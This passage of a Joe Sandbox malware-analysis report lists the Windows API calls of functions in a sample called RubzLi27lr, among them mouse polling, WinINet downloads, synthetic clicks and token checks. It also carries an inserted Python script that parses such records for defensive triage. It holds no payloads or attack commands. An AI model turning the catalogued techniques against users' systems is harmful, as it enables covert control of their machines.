                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4210589936-0
                                                                                                                  • Opcode ID: aa6141782fba79caaad61fb6afb8b150ba27fa2e3df25130646b2037769fea11
                                                                                                                  • Instruction ID: 0456e9656025a730c14e12f7756c42590fc34c75fed46584f337eaa001ab3764
                                                                                                                  • Opcode Fuzzy Hash: aa6141782fba79caaad61fb6afb8b150ba27fa2e3df25130646b2037769fea11
                                                                                                                  • Instruction Fuzzy Hash: 27416031A0850AFBDF559F64C849BEEFBB4FB05320F258359E429A72D0CB306A50DB91
                                                                                                                  APIs
                                                                                                                  • GetInputState.USER32 ref: 00B238CB
                                                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B23922
                                                                                                                  • TranslateMessage.USER32(?), ref: 00B2394B
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00B23955
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B23966
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2256411358-0
                                                                                                                  • Opcode ID: 46c42f4189da5e91f8c2e8a4f76d3b9a96d615772be63a86501d26ffb6f5b41e
                                                                                                                  • Instruction ID: 2c94995762687137eb3635c898285967d2fa23a8e96073b0d808e619850955c8
                                                                                                                  • Opcode Fuzzy Hash: 46c42f4189da5e91f8c2e8a4f76d3b9a96d615772be63a86501d26ffb6f5b41e
                                                                                                                  • Instruction Fuzzy Hash: 9A31B9705053619EEB35CB34E849BB63BE8EB16B04F04099DE45BC71A0DBBC9AC5CB21
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CF38
                                                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00B2CF6F
                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFB4
                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFC8
                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3191363074-0
                                                                                                                  • Opcode ID: 1639b85d58b633ad272352436e588362b1f1335454abfd36061dde606de3b953
                                                                                                                  • Instruction ID: 60bdac37ab36d7b65656e288a0ec005c4afff68bea82b5d15a7060ce42e6e70e
                                                                                                                  • Opcode Fuzzy Hash: 1639b85d58b633ad272352436e588362b1f1335454abfd36061dde606de3b953
                                                                                                                  • Instruction Fuzzy Hash: 28319C71500215EFDB20DFA5EA84AAFBFF9FB14350B1040AEF10AD3140DB30AE489B60
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B11915
                                                                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B119C1
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00B119C9
                                                                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B119DA
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B119E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3382505437-0
                                                                                                                  • Opcode ID: 83004992f4533685b108cae9dca59578f67e71c8e6d768ad52c98ba84d402099
                                                                                                                  • Instruction ID: 4fe1c136702f7a26bfe819a8b69eb77799205cf1c28c97df7dbb8e8ad16c4f1e
                                                                                                                  • Opcode Fuzzy Hash: 83004992f4533685b108cae9dca59578f67e71c8e6d768ad52c98ba84d402099
                                                                                                                  • Instruction Fuzzy Hash: 8F31E071A00219EFCB00CFACCD98ADE3BB5FB05314F108669FA21A72D0C7709A85CB90
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B45745
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B4579D
                                                                                                                  • _wcslen.LIBCMT ref: 00B457AF
                                                                                                                  • _wcslen.LIBCMT ref: 00B457BA
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B45816
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 763830540-0
                                                                                                                  • Opcode ID: e11d3d05fba968b1bd4d0184dac6b7170dbc132b6983347aeaef036753ad0e20
                                                                                                                  • Instruction ID: 48cef18e73fb54087a3784c8c692adef9e87ac6fbc98966a10d30e40a20dc0e5
                                                                                                                  • Opcode Fuzzy Hash: e11d3d05fba968b1bd4d0184dac6b7170dbc132b6983347aeaef036753ad0e20
                                                                                                                  • Instruction Fuzzy Hash: 2721C370904A189BDB308F60CC85AED7BF8FF04720F108296E929EB281D7708B85DF50
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00B30951
                                                                                                                  • GetForegroundWindow.USER32 ref: 00B30968
                                                                                                                  • GetDC.USER32(00000000), ref: 00B309A4
                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00B309B0
                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00B309E8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4156661090-0
                                                                                                                  • Opcode ID: 0a9cc509d960ffb3c9c3dc6bcf29da17bdb05f93ad54f4cb3dcc01e8afed8fea
                                                                                                                  • Instruction ID: 42a8a7eb13135f10b347a1297e5bd9616e5f81d7ec7ed3db4023a67d67773402
                                                                                                                  • Opcode Fuzzy Hash: 0a9cc509d960ffb3c9c3dc6bcf29da17bdb05f93ad54f4cb3dcc01e8afed8fea
                                                                                                                  • Instruction Fuzzy Hash: 7721A139600214AFD714EF69D984AAEBBF9FF45710F1485A8F84A97362CB70AD04CB50
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00AECDC6
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AECDE9
                                                                                                                    • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AECE0F
                                                                                                                  • _free.LIBCMT ref: 00AECE22
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AECE31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 336800556-0
                                                                                                                  • Opcode ID: 8bc3faf5249896fa04b58f010253a707cbc8ff9d0d8f2a757cb63670fb31e42e
                                                                                                                  • Instruction ID: 087eb7f2085af075acc93d16ce5f540275b6ad04cad8f8370a5c08559d8179d4
                                                                                                                  • Opcode Fuzzy Hash: 8bc3faf5249896fa04b58f010253a707cbc8ff9d0d8f2a757cb63670fb31e42e
                                                                                                                  • Instruction Fuzzy Hash: 3301DF726022957FA3211BBB6C8CD7B6E6DEEC7FB13150129F905D7201EE618E0282B0
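The records above are the Joe Sandbox IDA plugin's per-function listing: each "APIs" block names the imports one function resolves, with the call-site address, the arguments the sandbox recovered ("?" where it could not), and, on indented "Part of subcall function" lines, imports the report attributes to a callee rather than to the function itself; the "Similarity" block's Opcode ID and fuzzy hashes exist to match the same function across samples. A report of this size carries hundreds of such records, which are easier to triage once parsed. The following Python script is an added example, not part of the report and not Joe Sandbox tooling: it parses the record format into structured calls, keeps subcall attributions separate, and tags functions by what their direct imports imply, reading the PostMessageW and GetAsyncKeyState arguments against the winuser.h constants WM_LBUTTONDOWN (0x0201), WM_LBUTTONUP (0x0202), VK_LBUTTON (1) and VK_RBUTTON (2). The sample input is four records copied from this page, trimmed to the lines the parser needs; the tag names and the classification rules are this script's own choices, not report vocabulary.

```python
"""Parse Joe Sandbox IDA-plugin "APIs" records into structured calls and tag each
function by what its imports imply (added example; tag names are this script's own)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Sample input: four records copied from this report, trimmed to the lines the parser
# needs (mouse poller, WinINet reader, click synthesiser, env-block copier with subcall).
SAMPLE = """\
APIs
• GetCursorPos.USER32(?), ref: 00AC9141
• ScreenToClient.USER32(00000000,?), ref: 00AC915E
• GetAsyncKeyState.USER32(00000001), ref: 00AC9183
• GetAsyncKeyState.USER32(00000002), ref: 00AC919D
Similarity
• API ID: AsyncState$ClientCursorScreen
• Opcode ID: aa6141782fba79caaad61fb6afb8b150ba27fa2e3df25130646b2037769fea11
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 00B2CF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFB4
Similarity
• Opcode ID: 1639b85d58b633ad272352436e588362b1f1335454abfd36061dde606de3b953
APIs
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00B119C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 00B119C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00B119DA
Similarity
• Opcode ID: 83004992f4533685b108cae9dca59578f67e71c8e6d768ad52c98ba84d402099
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00AECDC6
  • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
• _free.LIBCMT ref: 00AECE22
Similarity
• Opcode ID: 8bc3faf5249896fa04b58f010253a707cbc8ff9d0d8f2a757cb63670fb31e42e
"""

# "<Name>.<MODULE>(<args>), ref: <addr>"; bullet, args and the subcall prefix are optional.
_CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
_KV_RE = re.compile(r"^\s*(?:•\s*)?(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")   # "• Opcode ID: ..."
WM_LBUTTONDOWN, WM_LBUTTONUP = 0x0201, 0x0202   # winuser.h
VK_LBUTTON, VK_RBUTTON = 0x01, 0x02             # winuser.h: the mouse buttons, not keys


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple                       # raw strings; "?" = not recovered by the sandbox
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set when the report attributes the call to a callee


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...
    tags: set = field(default_factory=set)


def _hex_arg(a: str) -> Optional[int]:
    return int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None   # "?" -> None


def classify(rec: FunctionRecord) -> set:
    # Subcall lines belong to callees, so skip them (the report's own "API ID" includes them).
    calls = [c for c in rec.calls if c.subcall_of is None]
    names = {c.name for c in calls}
    tags = set()
    polled = {_hex_arg(c.args[0]) for c in calls if c.name == "GetAsyncKeyState" and c.args}
    if polled & {VK_LBUTTON, VK_RBUTTON}:
        tags.add("mouse-button-polling")
    posted = {_hex_arg(c.args[1]) for c in calls if c.name == "PostMessageW" and len(c.args) > 1}
    if {WM_LBUTTONDOWN, WM_LBUTTONUP} <= posted:
        tags.add("synthetic-click")
    if {"InternetReadFile", "InternetQueryDataAvailable"} & names:
        tags.add("wininet-download")
    return tags


def parse_records(text: str) -> list:
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":    # every record opens with its API list
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := _CALL_RE.match(line)):
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
            cur.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                     int(m["subfn"], 16) if m["subfn"] else None))
        elif (m := _KV_RE.match(line)):
            cur.meta[m["key"]] = m["val"].strip()
    for r in records:
        r.tags = classify(r)
    return records


def find_by_api(records: list, api_name: str) -> list:
    """Functions that call api_name directly; pivot on their Opcode IDs across samples."""
    return [r for r in records if any(c.name == api_name and c.subcall_of is None for c in r.calls)]
```

Two caveats the tags encode: GetAsyncKeyState with arguments 1 and 2 polls the left and right mouse buttons, so that function on its own is not evidence of keystroke capture, and the RtlAllocateHeap line under GetEnvironmentStringsW is counted for the callee at 00AE3820, not for the function whose record it appears in, even though the report's "API ID" string (AllocateFreeHeap) folds it in. The PostMessageW pair with a Sleep between them is a synthesised click on a target window, which is how a script host drives another application's controls.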
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AC9693
• SelectObject.GDI32(?,00000000), ref: 00AC96A2
• BeginPath.GDI32(?), ref: 00AC96B9
• SelectObject.GDI32(?,00000000), ref: 00AC96E2
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
• GetLastError.KERNEL32(?,?,?,00ADF2DE,00AE3863,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6), ref: 00AE2DFD
• _free.LIBCMT ref: 00AE2E32
• _free.LIBCMT ref: 00AE2E59
• SetLastError.KERNEL32(00000000,00AB1129), ref: 00AE2E66
• SetLastError.KERNEL32(00000000,00AB1129), ref: 00AE2E6F
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?,?,00B1035E), ref: 00B1002B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10046
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10054
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?), ref: 00B10064
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10070
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 00B1E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 00B1E9A5
• Sleep.KERNEL32(00000000), ref: 00B1E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 00B1E9B7
• Sleep.KERNEL32 ref: 00B1E9F3
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B11114
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11120
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B1112F
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11136
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B1114D
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B10FCA
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B10FD6
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B10FE5
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B10FEC
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B11002
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B1102A
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B11036
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11045
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B1104C
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11062
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20324
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20331
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B2033E
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B2034B
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20358
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00B2017D,?,00B232FC,?,00000001,00AF2592,?), ref: 00B20365
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
